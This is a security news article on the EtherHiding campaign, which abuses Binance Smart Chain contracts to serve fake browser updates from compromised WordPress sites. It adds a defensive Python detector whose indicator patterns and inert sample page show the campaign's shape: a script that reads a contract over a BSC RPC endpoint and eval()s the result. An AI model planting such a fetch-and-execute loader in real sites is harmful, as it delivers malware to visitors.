Binance Smart Chain Abused in 'EtherHiding' Malware Onslaught

Cybercriminals exploit Binance Smart Chain to spread EtherHiding malware through compromised WordPress sites, presenting fake browser updates to victims.

Key Takeaways

  • Cybercriminals leverage Binance’s Smart Chain contracts to host malicious code, initiating the EtherHiding malware campaign.
  • Compromised WordPress sites trick users with fake browser update alerts, leading to malware like Amadey, Lumma, or RedLine.
  • The decentralized, anonymous nature of blockchain makes this new method of attack difficult to detect and neutralize.
  • Ensuring up-to-date systems, removing redundant admin users, and robust passwords are crucial for WordPress site security.

Cyber adversaries have reached a new pinnacle of deviousness by exploiting Binance’s Smart Chain (BSC) contracts to disseminate malicious code, a strategy experts at Guardio Labs are calling “the next evolution in bulletproof hosting.” Dubbed EtherHiding, this menacing campaign was unearthed approximately two months ago and is a worrying escalation in a series of attacks that abuse compromised WordPress sites.

Binance Smart Chain

Victims are lured into a trap by being presented with sham alerts urging a browser update before they continue navigating the websites. Unfortunately, compliance leads to the installation of dangerous information-stealing programs such as Amadey, Lumma, or RedLine. “After their initial Cloudflare Worker-hosted code was neutralized, they’ve adeptly shifted strategies, exploiting the blockchain’s inherent decentralized, anonymous, and transparent qualities,” reveal security analysts Nati Tal and Oleg Zaytsev.

The alarming agility of this campaign means it’s not only thriving but is also notoriously challenging to identify and dismantle. The method involves the corruption of WordPress sites through malicious plugins or known vulnerabilities in mainstream plugins, allowing attackers virtually unbridled control over the compromised platforms.

In this sophisticated sequence of assaults, compromised sites are loaded with obfuscated JavaScript that interacts with the BNB Smart Chain through a purpose-built smart contract deployed from an attacker-controlled blockchain address. Reading that contract returns the next stage, triggering a cascade of scripts that ultimately culminates in deceptive browser update prompts.

If the victim falls for the ruse and engages with the update, they’re led into a quagmire where malware-laden executables are downloaded from reputable file-hosting services. Because the contract lives on a decentralized blockchain, there is no hosting provider to take it down and no single server to block, so the malicious contract stays active and the attack chain remains intact.
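As an added example (not code from the article or from Guardio Labs), the following Python heuristic lets a WordPress site owner scan a page's HTML for script blocks that combine the traits described above: a BSC JSON-RPC endpoint, a contract read, a 40-hex-digit address and dynamic execution of whatever comes back. The endpoint pattern, the indicator weights, the threshold and the sample page are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass

# Heuristic indicators of the EtherHiding pattern: page-side JavaScript that
# reaches a BSC RPC endpoint, reads a contract, and executes the result.
# Host pattern, weights and threshold are assumptions chosen for this example.
INDICATORS = {
    "bsc_rpc_host": (re.compile(r"bsc-dataseed\d*\.binance\.org", re.I), 3),
    "eth_call":     (re.compile(r'["\']eth_call["\']|JsonRpcProvider|Web3\.providers', re.I), 2),
    "contract_addr": (re.compile(r"0x[0-9a-fA-F]{40}"), 1),
    "dynamic_exec": (re.compile(r"\beval\s*\(|new\s+Function\s*\(|document\.write\s*\("
                                r"|createElement\s*\(\s*['\"]script['\"]", re.I), 2),
    "update_lure":  (re.compile(r"update\s+(your\s+)?(browser|chrome|firefox|edge)", re.I), 1),
}
THRESHOLD = 6  # a lone createElement('script') (2) is normal; the full chain scores 8

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)

@dataclass
class Finding:
    index: int        # position of the <script> block in the page
    score: int
    hits: list

def scan_html(html: str) -> list[Finding]:
    """Return every <script> block whose indicator score reaches THRESHOLD."""
    findings = []
    for i, m in enumerate(SCRIPT_RE.finditer(html)):
        body = m.group(1) + m.group(2)  # attributes (e.g. src=...) plus inline body
        hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(body)]
        score = sum(INDICATORS[h][1] for h in hits)
        if score >= THRESHOLD:
            findings.append(Finding(i, score, hits))
    return findings

# Constructed sample page: a benign loader followed by an inert, injected-style
# block shaped like the campaign (zero address, undefined abi; it does nothing).
SAMPLE_PAGE = """
<html><head>
<script>
  var s = document.createElement('script'); s.src = '/wp-includes/js/jquery.js';
  document.head.appendChild(s);
</script>
</head><body>
<script>
  const p = new ethers.providers.JsonRpcProvider('https://bsc-dataseed1.binance.org');
  const c = new ethers.Contract('0x0000000000000000000000000000000000000000', abi, p);
  c.get().then(r => eval(r));
</script>
</body></html>
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        print(f"script #{f.index}: score {f.score}, hits {f.hits}")
```

Run it against the HTML served by the site (not the theme files alone), since the injected block may be added by a compromised plugin at render time.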

Concluding Thoughts

The EtherHiding campaign underscores the double-edged sword of decentralized technologies. While blockchain’s immutability and transparency offer revolutionary applications, these very traits can be manipulated by cybercriminals to create nearly indestructible networks for malware deployment.

For entities using WordPress, this development is a stark reminder of the importance of rigorous cybersecurity hygiene. The dynamics of cybersecurity are ever-evolving, and the onus is on individual users and organizations to remain abreast of updates, diligently apply patches, and maintain a robust defensive posture. In the unending cat-and-mouse game with threat actors, staying informed and proactive is not just beneficial—it’s essential for survival in the digital realm.